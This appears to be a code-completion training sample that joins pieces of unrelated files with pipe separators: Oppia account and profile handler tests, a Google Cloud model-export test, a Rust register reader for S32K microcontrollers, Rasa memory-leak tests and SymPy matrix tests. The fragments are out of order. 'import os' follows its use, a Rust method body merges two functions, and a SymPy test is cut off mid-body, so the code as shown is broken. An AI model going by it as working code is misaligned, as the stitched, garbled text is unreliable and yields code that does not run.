u'collection_progress_data': {},
u'story_snapshot_metadata_data': {},
u'user_community_rights_data': {},
u'user_contributions_data': {
u'edited_exploration_ids': [],
u'created_exploration_ids': []
},
u'general_feedback_thread_user_data': {},
u'question_snapshot_metadata_data': {},
u'general_feedback_message_data': {},
u'story_progress_data': {},
u'learner_playlist_data': {},
u'collection_rights_data': {
u'voiced_collection_ids': [],
u'owned_collection_ids': [],
u'viewable_collection_ids': [],
u'editable_collection_ids': []
},
u'skill_snapshot_metadata_data': {},
u'exploration_user_data_data': {},
u'collection_snapshot_metadata_data': {},
u'exploration_rights_data': {
u'viewable_exploration_ids': [],
u'owned_exploration_ids': [],
u'voiced_exploration_ids': [],
u'editable_exploration_ids': []
},
u'topic_snapshot_metadata_data': {},
u'completed_activities_data': {},
u'general_feedback_thread_data': {},
u'topic_rights_snapshot_metadata_data': {},
u'user_stats_data': {},
u'exploration_rights_snapshot_metadata_data': {},
u'user_subscriptions_data': {
u'creator_usernames': [],
u'collection_ids': [],
u'activity_ids': [],
u'general_feedback_thread_ids': [],
u'last_checked': None
},
u'config_property_snapshot_metadata_data': {},
u'exploration_snapshot_metadata_data': {},
u'incomplete_activities_data': {},
u'user_skill_mastery_data': {},
u'exp_user_last_playthrough_data': {},
u'user_settings_data': {
u'username': u'editor',
u'last_agreed_to_terms': self.GENERIC_EPOCH,
u'last_started_state_translation_tutorial': None,
u'last_started_state_editor_tutorial': None,
u'normalized_username': u'editor',
u'first_contribution_msec': None,
u'preferred_language_codes': [
u'en'
],
u'creator_dashboard_display_pref': u'card',
u'subject_interests': [],
u'default_dashboard': None,
u'preferred_site_language_code': None,
u'user_bio': u'',
u'profile_picture_data_url':
user_services.DEFAULT_IDENTICON_DATA_URL,
u'role': u'EXPLORATION_EDITOR',
u'last_edited_an_exploration': None,
u'email': u'[email protected]',
u'preferred_audio_language_code': None,
u'last_logged_in': self.GENERIC_EPOCH
},
u'general_suggestion_data': {},
u'user_contribution_scoring_data': {},
u'general_feedback_email_reply_to_id_data': {},
u'collection_rights_snapshot_metadata_data': {}
}
self.assertEqual(
data,
expected_data
)
def test_export_account_handler_disabled_logged_in(self):
with self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', False):
self.get_json('/export-account-handler', expected_status_int=404)
def test_export_account_hander_disabled_logged_out(self):
self.logout()
with self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', False):
self.get_json('/export-account-handler', expected_status_int=401)
def test_export_account_handler_enabled_logged_out(self):
self.logout()
with self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', True):
self.get_json('/export-account-handler', expected_status_int=401)
class PendingAccountDeletionPageTests(test_utils.GenericTestBase):
def test_get_pending_account_deletion_page(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', True):
response = self.get_html_response('/pending-account-deletion')
self.assertIn('Pending Account Deletion', response.body)
def test_get_pending_account_deletion_page_disabled(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', False):
self.get_html_response('/pending-account-deletion',
expected_status_int=404)
class UsernameCheckHandlerTests(test_utils.GenericTestBase):
def test_username_check(self):
self.signup('[email protected]', username='abc')
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL, {'username': 'abc'},
csrf_token=csrf_token)
self.assertEqual(
response_dict, {
'username_is_taken': True
})
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL, {'username': 'def'},
csrf_token=csrf_token)
self.assertEqual(
response_dict, {
'username_is_taken': False
})
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL, {'username': '!!!INVALID!!!'},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL,
{'username': self.UNICODE_TEST_STRING},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
self.logout()
class SiteLanguageHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(SiteLanguageHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
def test_save_site_language_handler(self):
"""Test the language is saved in the preferences when handler is
called.
"""
language_code = 'es'
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data', {
'update_type': 'preferred_site_language_code',
'data': language_code,
}, csrf_token=csrf_token)
preferences = self.get_json('/preferenceshandler/data')
self.assertIsNotNone(preferences)
self.assertEqual(
preferences['preferred_site_language_code'], language_code)
self.logout()
def test_can_update_site_language_code(self):
self.login(self.EDITOR_EMAIL)
user_settings = user_services.get_user_settings(
self.editor_id, strict=True)
self.assertIsNone(user_settings.preferred_site_language_code)
csrf_token = self.get_new_csrf_token()
self.put_json(
feconf.SITE_LANGUAGE_DATA_URL, payload={'site_language_code': 'en'},
csrf_token=csrf_token)
user_settings = user_services.get_user_settings(
self.editor_id, strict=True)
self.assertEqual(user_settings.preferred_site_language_code, 'en')
self.logout()
class UserInfoHandlerTests(test_utils.GenericTestBase):
def test_user_info_handler(self):
"""Test the language is saved in the preferences when handler is
called.
"""
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
json_response = self.get_json('/userinfohandler')
self.assertDictEqual({
'is_moderator': False,
'is_admin': False,
'is_topic_manager': False,
'is_super_admin': False,
'can_create_collections': False,
'preferred_site_language_code': None,
'username': self.EDITOR_USERNAME,
'email': self.EDITOR_EMAIL,
'user_is_logged_in': True}, json_response)
self.logout()
json_response = self.get_json('/userinfohandler')
self.assertDictEqual({
'user_is_logged_in': False
}, json_response)
class UrlHandlerTests(test_utils.GenericTestBase):
def test_login_url_is_none_for_signed_in_user(self):
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
response = self.get_json('/url_handler')
self.assertIsNone(response['login_url'])
self.logout()
def test_login_url_gets_created_for_signed_out_users(self):
response = self.get_json(
'/url_handler', params={'current_url': 'random_url'})
self.assertTrue(response['login_url'].endswith('random_url'))
| with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', True):
data = self.delete_json('/delete-account-handler')
self.assertEqual(data, {'success': True}) |
export_model_tabular_classification_sample_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License. | from uuid import uuid4
import pytest
import export_model_tabular_classification_sample
PROJECT_ID = os.getenv("BUILD_SPECIFIC_GCLOUD_PROJECT")
MODEL_ID = "6036688272397172736" # iris 1000
GCS_BUCKET = "gs://ucaip-samples-test-output"
GCS_PREFIX = f"tmp/export_model_test_{uuid4()}"
@pytest.fixture(scope="function", autouse=True)
def teardown(storage_client):
yield
bucket = storage_client.get_bucket("ucaip-samples-test-output")
blobs = bucket.list_blobs(prefix=GCS_PREFIX)
for blob in blobs:
blob.delete()
def test_ucaip_generated_export_model_tabular_classification_sample(capsys):
export_model_tabular_classification_sample.export_model_tabular_classification_sample(
project=PROJECT_ID,
model_id=MODEL_ID,
gcs_destination_output_uri_prefix=f"{GCS_BUCKET}/{GCS_PREFIX}",
)
out, _ = capsys.readouterr()
assert "output_info" in out |
import os |
sdid.rs | #[doc = "Register `SDID` reader"]
pub struct R(crate::R<SDID_SPEC>);
impl core::ops::Deref for R {
type Target = crate::R<SDID_SPEC>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl From<crate::R<SDID_SPEC>> for R {
#[inline(always)]
fn from(reader: crate::R<SDID_SPEC>) -> Self {
R(reader)
}
}
#[doc = "Field `FEATURES` reader - Features"]
pub struct FEATURES_R(crate::FieldReader<u8, u8>);
impl FEATURES_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
FEATURES_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for FEATURES_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Package\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum PACKAGE_A {
#[doc = "2: 48 LQFP"]
_0010 = 2,
#[doc = "3: 64 LQFP"]
_0011 = 3,
#[doc = "4: 100 LQFP"]
_0100 = 4,
#[doc = "6: 144 LQFP"]
_0110 = 6,
#[doc = "7: 176 LQFP"]
_0111 = 7,
#[doc = "8: 100 MAP BGA"]
_1000 = 8,
}
impl From<PACKAGE_A> for u8 {
#[inline(always)]
fn from(variant: PACKAGE_A) -> Self {
variant as _
}
}
#[doc = "Field `PACKAGE` reader - Package"]
pub struct PACKAGE_R(crate::FieldReader<u8, PACKAGE_A>);
impl PACKAGE_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
PACKAGE_R(crate::FieldReader::new(bits))
}
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> Option<PACKAGE_A> {
match self.bits {
2 => Some(PACKAGE_A::_0010),
3 => Some(PACKAGE_A::_0011),
4 => Some(PACKAGE_A::_0100),
6 => Some(PACKAGE_A::_0110),
7 => Some(PACKAGE_A::_0111),
8 => Some(PACKAGE_A::_1000),
_ => None,
}
}
#[doc = "Checks if the value of the field is `_0010`"]
#[inline(always)]
pub fn is_0010(&self) -> bool {
**self == PACKAGE_A::_0010
}
#[doc = "Checks if the value of the field is `_0011`"]
#[inline(always)]
pub fn is_0011(&self) -> bool {
**self == PACKAGE_A::_0011
}
#[doc = "Checks if the value of the field is `_0100`"]
#[inline(always)]
pub fn is_0100(&self) -> bool {
**self == PACKAGE_A::_0100
}
#[doc = "Checks if the value of the field is `_0110`"]
#[inline(always)]
pub fn is_0110(&self) -> bool {
**self == PACKAGE_A::_0110
}
#[doc = "Checks if the value of the field is `_0111`"]
#[inline(always)]
pub fn is_0111(&self) -> bool {
**self == PACKAGE_A::_0111
}
#[doc = "Checks if the value of the field is `_1000`"]
#[inline(always)]
pub fn is_1000(&self) -> bool {
**self == PACKAGE_A::_1000
}
}
impl core::ops::Deref for PACKAGE_R {
type Target = crate::FieldReader<u8, PACKAGE_A>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `REVID` reader - Device revision number"]
pub struct REVID_R(crate::FieldReader<u8, u8>);
impl REVID_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
REVID_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for REVID_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "RAM size\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum RAMSIZE_A {
#[doc = "11: 192 KB (S32K148), 96 KB (S32K146), Reserved (others)"]
_1011 = 11,
#[doc = "13: 48 KB (S32K144), Reserved (others)"]
_1101 = 13,
#[doc = "15: 256 KB (S32K148), 128 KB (S32K146), 64 KB (S32K144), 32 KB (S32K142), 25 KB (S32K118), 17 KB (S32K116)"]
_1111 = 15,
}
impl From<RAMSIZE_A> for u8 {
#[inline(always)]
fn from(variant: RAMSIZE_A) -> Self {
variant as _
}
}
#[doc = "Field `RAMSIZE` reader - RAM size"]
pub struct RAMSIZE_R(crate::FieldReader<u8, RAMSIZE_A>);
impl RAMSIZE_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
RAMSIZE_R(crate::FieldReader::new(bits))
}
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> Option<RAMSIZE_A> {
match self.bits {
11 => Some(RAMSIZE_A::_1011),
13 => Some(RAMSIZE_A::_1101),
15 => Some(RAMSIZE_A::_1111),
_ => None,
}
}
#[doc = "Checks if the value of the field is `_1011`"]
#[inline(always)]
pub fn is_1011(&self) -> bool {
**self == RAMSIZE_A::_1011 | **self == RAMSIZE_A::_1101
}
#[doc = "Checks if the value of the field is `_1111`"]
#[inline(always)]
pub fn is_1111(&self) -> bool {
**self == RAMSIZE_A::_1111
}
}
impl core::ops::Deref for RAMSIZE_R {
type Target = crate::FieldReader<u8, RAMSIZE_A>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `DERIVATE` reader - Derivate"]
pub struct DERIVATE_R(crate::FieldReader<u8, u8>);
impl DERIVATE_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
DERIVATE_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for DERIVATE_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `SUBSERIES` reader - Subseries"]
pub struct SUBSERIES_R(crate::FieldReader<u8, u8>);
impl SUBSERIES_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
SUBSERIES_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for SUBSERIES_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `GENERATION` reader - S32K product series generation"]
pub struct GENERATION_R(crate::FieldReader<u8, u8>);
impl GENERATION_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
GENERATION_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for GENERATION_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl R {
#[doc = "Bits 0:7 - Features"]
#[inline(always)]
pub fn features(&self) -> FEATURES_R {
FEATURES_R::new((self.bits & 0xff) as u8)
}
#[doc = "Bits 8:11 - Package"]
#[inline(always)]
pub fn package(&self) -> PACKAGE_R {
PACKAGE_R::new(((self.bits >> 8) & 0x0f) as u8)
}
#[doc = "Bits 12:15 - Device revision number"]
#[inline(always)]
pub fn revid(&self) -> REVID_R {
REVID_R::new(((self.bits >> 12) & 0x0f) as u8)
}
#[doc = "Bits 16:19 - RAM size"]
#[inline(always)]
pub fn ramsize(&self) -> RAMSIZE_R {
RAMSIZE_R::new(((self.bits >> 16) & 0x0f) as u8)
}
#[doc = "Bits 20:23 - Derivate"]
#[inline(always)]
pub fn derivate(&self) -> DERIVATE_R {
DERIVATE_R::new(((self.bits >> 20) & 0x0f) as u8)
}
#[doc = "Bits 24:27 - Subseries"]
#[inline(always)]
pub fn subseries(&self) -> SUBSERIES_R {
SUBSERIES_R::new(((self.bits >> 24) & 0x0f) as u8)
}
#[doc = "Bits 28:31 - S32K product series generation"]
#[inline(always)]
pub fn generation(&self) -> GENERATION_R {
GENERATION_R::new(((self.bits >> 28) & 0x0f) as u8)
}
}
#[doc = "System Device Identification Register\n\nThis register you can [`read`](crate::generic::Reg::read). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [sdid](index.html) module"]
pub struct SDID_SPEC;
impl crate::RegisterSpec for SDID_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [sdid::R](R) reader structure"]
impl crate::Readable for SDID_SPEC {
type Reader = R;
}
#[doc = "`reset()` method sets SDID to value 0"]
impl crate::Resettable for SDID_SPEC {
#[inline(always)]
fn reset_value() -> Self::Ux {
0
}
} | }
#[doc = "Checks if the value of the field is `_1101`"]
#[inline(always)]
pub fn is_1101(&self) -> bool { |
test_memory_leak.py | import abc
import json
import subprocess
import sys
import tempfile
import time
from pathlib import Path
from typing import Text, List, Tuple, Optional, Union
import memory_profiler
import psutil
import pytest
import rasa
import rasa.shared.utils.io
PROFILING_INTERVAL = 0.1
# Enable this to plot the results locally
WRITE_RESULTS_TO_DISK = False
def _custom_default_config(
tmp_path: Union[Path, Text], epochs: int, max_history: Optional[int] = -1
) -> Text:
# Override default config to use custom amount of epochs
default_config = Path("rasa", "shared", "importers", "default_config.yml")
config = rasa.shared.utils.io.read_yaml_file(default_config)
for model_part, items in config.items():
for item in items:
if "epochs" in item:
item["epochs"] = epochs
if "max_history" in item and max_history != -1:
item["max_history"] = None
config_for_test = Path(tmp_path) / "test_config.yml"
rasa.shared.utils.io.write_yaml(config, config_for_test)
return str(config_for_test)
class MemoryLeakTest(abc.ABC):
"""Generic template for memory leak tests."""
@property
def max_memory_threshold_mb(self) -> float:
return 1000
@pytest.fixture
@abc.abstractmethod
def name_for_dumped_files(self) -> Text:
raise NotImplementedError
@abc.abstractmethod
def function_to_profile(self) -> None:
raise NotImplementedError
@pytest.mark.timeout(720, func_only=True)
def test_for_memory_leak(
self, name_for_dumped_files: Text, tmp_path: Path,
) -> None:
# Run as separate process to avoid other things affecting the memory usage.
# Unfortunately `memory-profiler` doesn't work properly with
# `multiprocessing.Process` as it can't handle the process exit
process = subprocess.Popen(
[
sys.executable,
"-c",
(
f"from {__name__} import {self.__class__.__name__}; "
f"t = {self.__class__.__name__}();"
f"t.function_to_profile()"
),
],
# Force TensorFlow to use CPU so we can track the memory usage
env={"CUDA_VISIBLE_DEVICES": "-1"},
)
# Wait until process is running to avoid race conditions with the memory
# profiling
while not psutil.pid_exists(process.pid):
time.sleep(0.01)
results = memory_profiler.memory_usage(
process,
interval=PROFILING_INTERVAL,
include_children=True,
timestamps=True,
)
# `memory-profiler` sometimes adds `None` values at the end which we don't need
results = [
memory_timestamp
for memory_timestamp in results
if memory_timestamp is not None
]
if WRITE_RESULTS_TO_DISK:
self._write_results(name_for_dumped_files, results)
max_memory_usage = max(results, key=lambda memory_time: memory_time[0])[0]
assert max_memory_usage < self.max_memory_threshold_mb
@staticmethod
def _write_results(base_name: Text, results: List[Tuple[float]]) -> None:
mprof_plot = Path(f"{base_name}_plot.txt")
mprof_results = Path(f"{base_name}_raw.json")
# plot this via `mprof plot mprof_result.txt`
with open(mprof_plot, "w") as f:
for memory, timestamp in results:
f.write(f"MEM {memory:.6f} {timestamp:.4f}\n")
# dump result as json to be able analyze them without re-running the test
with open(mprof_results, "w") as f:
f.write(json.dumps(results))
class TestNLULeakManyEpochs(MemoryLeakTest):
"""Tests for memory leaks in NLU components when training with many epochs."""
@property
def epochs(self) -> int:
return 30
@property
def max_memory_threshold_mb(self) -> float:
return 2200
def function_to_profile(self) -> None:
import rasa.model_training
with tempfile.TemporaryDirectory() as temp_dir:
rasa.model_training.train_nlu(
_custom_default_config(temp_dir, epochs=self.epochs),
Path("data", "test_nlu_no_responses", "sara_nlu_data.yml"),
output=temp_dir,
)
@pytest.fixture()
def name_for_dumped_files(self) -> Text:
return (
f"memory_usage_rasa_nlu_{rasa.__version__}_"
f"epochs{self.epochs}_training_runs1"
)
class TestCoreLeakManyEpochs(MemoryLeakTest):
"""Tests for memory leaks in Core policies when training with many epochs."""
@property
def epochs(self) -> int:
return 200
@property
def max_memory_threshold_mb(self) -> float:
return 2000
def function_to_profile(self) -> None:
import rasa.model_training
with tempfile.TemporaryDirectory() as temp_dir:
rasa.model_training.train_core(
"data/test_domains/default_with_slots.yml",
_custom_default_config(temp_dir, epochs=self.epochs, max_history=None),
"data/test_yaml_stories/stories_defaultdomain.yml",
output=temp_dir,
additional_arguments={"augmentation_factor": 20},
)
@pytest.fixture()
def name_for_dumped_files(self) -> Text:
return (
f"memory_usage_rasa_core_{rasa.__version__}_"
f"epochs{self.epochs}_training_runs1"
)
class TestCRFDenseFeaturesLeak(MemoryLeakTest):
"""Tests for memory leaks in NLU the CRF when using dense features."""
@property
def epochs(self) -> int:
return 1
@property
def max_memory_threshold_mb(self) -> float:
return 1600
def function_to_profile(self) -> None:
import rasa.model_training
config = {
"pipeline": [
{"name": "SpacyNLP"},
{"name": "SpacyTokenizer"},
{"name": "SpacyFeaturizer"},
{
"name": "CRFEntityExtractor",
"features": [
["pos", "pos2"],
[
"bias",
"prefix5",
"prefix2",
"suffix5",
"suffix3",
"suffix2",
"pos",
"pos2",
"digit",
"text_dense_features",
],
["pos", "pos2"],
],
},
]
}
with tempfile.TemporaryDirectory() as temp_dir:
config_for_test = Path(temp_dir) / "test_config.yml"
rasa.shared.utils.io.write_yaml(config, config_for_test)
rasa.model_training.train_nlu(
str(config_for_test),
str(Path("data", "test_nlu_no_responses", "sara_nlu_data.yml")),
output=temp_dir,
)
@pytest.fixture()
def name_for_dumped_files(self) -> Text:
| return f"memory_usage_rasa_nlu_crf_dense_{rasa.__version__}_" |
|
test_commonmatrix.py | import collections
import random
from sympy.assumptions import Q
from sympy.core.add import Add
from sympy.core.compatibility import range
from sympy.core.function import (Function, diff)
from sympy.core.numbers import (E, Float, I, Integer, oo, pi)
from sympy.core.relational import (Eq, Lt)
from sympy.core.singleton import S
from sympy.core.symbol import (Symbol, symbols)
from sympy.functions.elementary.complexes import Abs
from sympy.functions.elementary.exponential import exp
from sympy.functions.elementary.miscellaneous import (Max, Min, sqrt)
from sympy.functions.elementary.piecewise import Piecewise
from sympy.functions.elementary.trigonometric import (cos, sin, tan)
from sympy.logic.boolalg import (And, Or)
from sympy.matrices.common import (ShapeError, MatrixError, NonSquareMatrixError,
_MinimalMatrix, MatrixShaping, MatrixProperties, MatrixOperations, MatrixArithmetic,
MatrixSpecial)
from sympy.matrices.matrices import (MatrixDeterminant,
MatrixReductions, MatrixSubspaces, MatrixEigen, MatrixCalculus)
from sympy.matrices import (Matrix, diag, eye,
matrix_multiply_elementwise, ones, zeros, SparseMatrix)
from sympy.polys.polytools import Poly
from sympy.simplify.simplify import simplify
from sympy.simplify.trigsimp import trigsimp
from sympy.utilities.exceptions import SymPyDeprecationWarning
from sympy.utilities.iterables import flatten
from sympy.utilities.pytest import (raises, XFAIL, slow, skip,
warns_deprecated_sympy)
from sympy.abc import a, b, c, d, x, y, z
# classes to test the basic matrix classes
class ShapingOnlyMatrix(_MinimalMatrix, MatrixShaping):
pass
def eye_Shaping(n):
return ShapingOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Shaping(n):
return ShapingOnlyMatrix(n, n, lambda i, j: 0)
class PropertiesOnlyMatrix(_MinimalMatrix, MatrixProperties):
pass
def eye_Properties(n):
return PropertiesOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Properties(n):
return PropertiesOnlyMatrix(n, n, lambda i, j: 0)
class OperationsOnlyMatrix(_MinimalMatrix, MatrixOperations):
pass
def eye_Operations(n):
return OperationsOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Operations(n):
return OperationsOnlyMatrix(n, n, lambda i, j: 0)
class ArithmeticOnlyMatrix(_MinimalMatrix, MatrixArithmetic):
pass
def eye_Arithmetic(n):
return ArithmeticOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Arithmetic(n):
return ArithmeticOnlyMatrix(n, n, lambda i, j: 0)
class DeterminantOnlyMatrix(_MinimalMatrix, MatrixDeterminant):
pass
def eye_Determinant(n):
return DeterminantOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Determinant(n):
return DeterminantOnlyMatrix(n, n, lambda i, j: 0)
class ReductionsOnlyMatrix(_MinimalMatrix, MatrixReductions):
pass
def eye_Reductions(n):
return ReductionsOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Reductions(n):
return ReductionsOnlyMatrix(n, n, lambda i, j: 0)
class SpecialOnlyMatrix(_MinimalMatrix, MatrixSpecial):
pass
class SubspaceOnlyMatrix(_MinimalMatrix, MatrixSubspaces):
pass
class EigenOnlyMatrix(_MinimalMatrix, MatrixEigen):
pass
class CalculusOnlyMatrix(_MinimalMatrix, MatrixCalculus):
pass
def test__MinimalMatrix():
x = _MinimalMatrix(2, 3, [1, 2, 3, 4, 5, 6])
assert x.rows == 2
assert x.cols == 3
assert x[2] == 3
assert x[1, 1] == 5
assert list(x) == [1, 2, 3, 4, 5, 6]
assert list(x[1, :]) == [4, 5, 6]
assert list(x[:, 1]) == [2, 5]
assert list(x[:, :]) == list(x)
assert x[:, :] == x
assert _MinimalMatrix(x) == x
assert _MinimalMatrix([[1, 2, 3], [4, 5, 6]]) == x
assert _MinimalMatrix(([1, 2, 3], [4, 5, 6])) == x
assert _MinimalMatrix([(1, 2, 3), (4, 5, 6)]) == x
assert _MinimalMatrix(((1, 2, 3), (4, 5, 6))) == x
assert not (_MinimalMatrix([[1, 2], [3, 4], [5, 6]]) == x)
# ShapingOnlyMatrix tests
def test_vec():
m = ShapingOnlyMatrix(2, 2, [1, 3, 2, 4])
m_vec = m.vec()
assert m_vec.cols == 1
for i in range(4):
assert m_vec[i] == i + 1
def test_tolist():
lst = [[S.One, S.Half, x*y, S.Zero], [x, y, z, x**2], [y, -S.One, z*x, 3]]
flat_lst = [S.One, S.Half, x*y, S.Zero, x, y, z, x**2, y, -S.One, z*x, 3]
m = ShapingOnlyMatrix(3, 4, flat_lst)
assert m.tolist() == lst
def test_row_col_del():
e = ShapingOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
raises(ValueError, lambda: e.row_del(5))
raises(ValueError, lambda: e.row_del(-5))
raises(ValueError, lambda: e.col_del(5))
raises(ValueError, lambda: e.col_del(-5))
assert e.row_del(2) == e.row_del(-1) == Matrix([[1, 2, 3], [4, 5, 6]])
assert e.col_del(2) == e.col_del(-1) == Matrix([[1, 2], [4, 5], [7, 8]])
assert e.row_del(1) == e.row_del(-2) == Matrix([[1, 2, 3], [7, 8, 9]])
assert e.col_del(1) == e.col_del(-2) == Matrix([[1, 3], [4, 6], [7, 9]])
def test_get_diag_blocks1():
a = Matrix([[1, 2], [2, 3]]) | assert c.get_diag_blocks() == [c]
def test_get_diag_blocks2():
a = Matrix([[1, 2], [2, 3]])
b = Matrix([[3, x], [y, 3]])
c = Matrix([[3, x, 3], [y, 3, z], [x, y, z]])
A, B, C, D = diag(a, b, b), diag(a, b, c), diag(a, c, b), diag(c, c, b)
A = ShapingOnlyMatrix(A.rows, A.cols, A)
B = ShapingOnlyMatrix(B.rows, B.cols, B)
C = ShapingOnlyMatrix(C.rows, C.cols, C)
D = ShapingOnlyMatrix(D.rows, D.cols, D)
assert A.get_diag_blocks() == [a, b, b]
assert B.get_diag_blocks() == [a, b, c]
assert C.get_diag_blocks() == [a, c, b]
assert D.get_diag_blocks() == [c, c, b]
def test_shape():
m = ShapingOnlyMatrix(1, 2, [0, 0])
m.shape == (1, 2)
def test_reshape():
m0 = eye_Shaping(3)
assert m0.reshape(1, 9) == Matrix(1, 9, (1, 0, 0, 0, 1, 0, 0, 0, 1))
m1 = ShapingOnlyMatrix(3, 4, lambda i, j: i + j)
assert m1.reshape(
4, 3) == Matrix(((0, 1, 2), (3, 1, 2), (3, 4, 2), (3, 4, 5)))
assert m1.reshape(2, 6) == Matrix(((0, 1, 2, 3, 1, 2), (3, 4, 2, 3, 4, 5)))
def test_row_col():
m = ShapingOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
assert m.row(0) == Matrix(1, 3, [1, 2, 3])
assert m.col(0) == Matrix(3, 1, [1, 4, 7])
def test_row_join():
assert eye_Shaping(3).row_join(Matrix([7, 7, 7])) == \
Matrix([[1, 0, 0, 7],
[0, 1, 0, 7],
[0, 0, 1, 7]])
def test_col_join():
assert eye_Shaping(3).col_join(Matrix([[7, 7, 7]])) == \
Matrix([[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[7, 7, 7]])
def test_row_insert():
r4 = Matrix([[4, 4, 4]])
for i in range(-4, 5):
l = [1, 0, 0]
l.insert(i, 4)
assert flatten(eye_Shaping(3).row_insert(i, r4).col(0).tolist()) == l
def test_col_insert():
c4 = Matrix([4, 4, 4])
for i in range(-4, 5):
l = [0, 0, 0]
l.insert(i, 4)
assert flatten(zeros_Shaping(3).col_insert(i, c4).row(0).tolist()) == l
# issue 13643
assert eye_Shaping(6).col_insert(3, Matrix([[2, 2], [2, 2], [2, 2], [2, 2], [2, 2], [2, 2]])) == \
Matrix([[1, 0, 0, 2, 2, 0, 0, 0],
[0, 1, 0, 2, 2, 0, 0, 0],
[0, 0, 1, 2, 2, 0, 0, 0],
[0, 0, 0, 2, 2, 1, 0, 0],
[0, 0, 0, 2, 2, 0, 1, 0],
[0, 0, 0, 2, 2, 0, 0, 1]])
def test_extract():
m = ShapingOnlyMatrix(4, 3, lambda i, j: i*3 + j)
assert m.extract([0, 1, 3], [0, 1]) == Matrix(3, 2, [0, 1, 3, 4, 9, 10])
assert m.extract([0, 3], [0, 0, 2]) == Matrix(2, 3, [0, 0, 2, 9, 9, 11])
assert m.extract(range(4), range(3)) == m
raises(IndexError, lambda: m.extract([4], [0]))
raises(IndexError, lambda: m.extract([0], [3]))
def test_hstack():
m = ShapingOnlyMatrix(4, 3, lambda i, j: i*3 + j)
m2 = ShapingOnlyMatrix(3, 4, lambda i, j: i*3 + j)
assert m == m.hstack(m)
assert m.hstack(m, m, m) == ShapingOnlyMatrix.hstack(m, m, m) == Matrix([
[0, 1, 2, 0, 1, 2, 0, 1, 2],
[3, 4, 5, 3, 4, 5, 3, 4, 5],
[6, 7, 8, 6, 7, 8, 6, 7, 8],
[9, 10, 11, 9, 10, 11, 9, 10, 11]])
raises(ShapeError, lambda: m.hstack(m, m2))
assert Matrix.hstack() == Matrix()
# test regression #12938
M1 = Matrix.zeros(0, 0)
M2 = Matrix.zeros(0, 1)
M3 = Matrix.zeros(0, 2)
M4 = Matrix.zeros(0, 3)
m = ShapingOnlyMatrix.hstack(M1, M2, M3, M4)
assert m.rows == 0 and m.cols == 6
